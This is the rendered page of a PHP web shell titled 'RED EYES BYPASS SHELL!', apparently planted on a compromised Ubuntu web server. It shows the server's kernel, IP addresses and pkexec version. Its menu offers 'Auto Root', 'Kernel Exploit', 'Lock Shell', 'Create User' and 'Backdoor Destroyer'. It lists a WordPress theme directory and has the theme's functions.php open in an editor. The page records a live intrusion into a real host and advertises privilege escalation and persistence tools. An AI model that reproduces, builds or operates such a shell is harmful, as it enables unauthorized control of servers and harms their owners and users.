Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
kadence /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
bbpress
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
lifterlms
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
tribe
[ DIR ]
drwxr-xr-x
tribe-events
[ DIR ]
drwxr-xr-x
tutor
[ DIR ]
drwxr-xr-x
404.php
403
B
-rwxr-xr-x
500.php
887
B
-rwxr-xr-x
LICENSE
34.33
KB
-rwxr-xr-x
accessibility.txt
2.1
KB
-rwxr-xr-x
changelog.txt
50.31
KB
-rwxr-xr-x
comments.php
1010
B
-rwxr-xr-x
footer.php
725
B
-rwxr-xr-x
functions.php
955
B
-rwxr-xr-x
header.php
1.24
KB
-rwxr-xr-x
index.php
284
B
-rwxr-xr-x
offline.php
948
B
-rwxr-xr-x
page.php
322
B
-rwxr-xr-x
readme.txt
54.44
KB
-rwxr-xr-x
screenshot.png
278.59
KB
-rwxr-xr-x
sidebar.php
841
B
-rwxr-xr-x
single.php
322
B
-rwxr-xr-x
style.css
1.32
KB
-rwxr-xr-x
theme.json
3.2
KB
-rwxr-xr-x
wpml-config.xml
2.76
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php /** * Kadence functions and definitions * * This file must be parseable by PHP 5.2. * * @link https://developer.wordpress.org/themes/basics/theme-functions/ * * @package kadence */ define( 'KADENCE_VERSION', '1.4.2' ); define( 'KADENCE_MINIMUM_WP_VERSION', '6.0' ); define( 'KADENCE_MINIMUM_PHP_VERSION', '7.4' ); // Bail if requirements are not met. if ( version_compare( $GLOBALS['wp_version'], KADENCE_MINIMUM_WP_VERSION, '<' ) || version_compare( phpversion(), KADENCE_MINIMUM_PHP_VERSION, '<' ) ) { require get_template_directory() . '/inc/back-compat.php'; return; } // Include WordPress shims. require get_template_directory() . '/inc/wordpress-shims.php'; // Load the `kadence()` entry point function. require get_template_directory() . '/inc/class-theme.php'; // Load the `kadence()` entry point function. require get_template_directory() . '/inc/functions.php'; // Initialize the theme. call_user_func( 'Kadence\kadence' );
Close